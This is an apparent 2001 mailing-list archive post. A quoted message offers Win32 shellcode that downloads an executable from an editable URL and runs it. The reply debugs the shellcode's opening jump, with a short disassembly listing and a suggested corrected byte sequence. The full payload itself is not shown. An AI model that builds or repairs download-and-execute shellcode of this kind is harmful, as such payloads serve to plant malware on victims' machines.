>I send a generic win32 shellcode in attachment. It has a size of 800 bytes >and have an editable URL line. It must point to an exe in internet. >Shellcode will download it and execute. It runs in Windows >95/98/ME/NT/2000 and XP. The file to download has a limit of 2.2 Mb. If >someone can test shellcode please send me an email for comment it. Why do you have an relative jump to [ShellCode-Entry] - 7 Bytes at the beginning of your code? (the first jump should be EIP+11 bytes: \xEB\x0B\x...) Debug: (added 4 nops; entry: 00401000) 00401003 90 nop 00401004 EB F7 jmp 00400FFD ;??? 00401006 8D 76 17 lea esi,[esi+17h] 00401009 8B FC mov edi,esp 0040100B 8B D7 mov edx,edi 0040100D F3 A4 rep movs byte ptr [edi],byte ptr [esi] 0040100F 52 push edx 00401010 C3 ret 00401011 EB 30 jmp 00401043 ;eip should jump to this address ;00401228 E8 E6 FD FF FF call 00401013 =>00401013 5F pop edi ... Der HexXer.
This archive was generated by hypermail 2b30 : Mon Aug 20 2001 - 08:17:49 PDT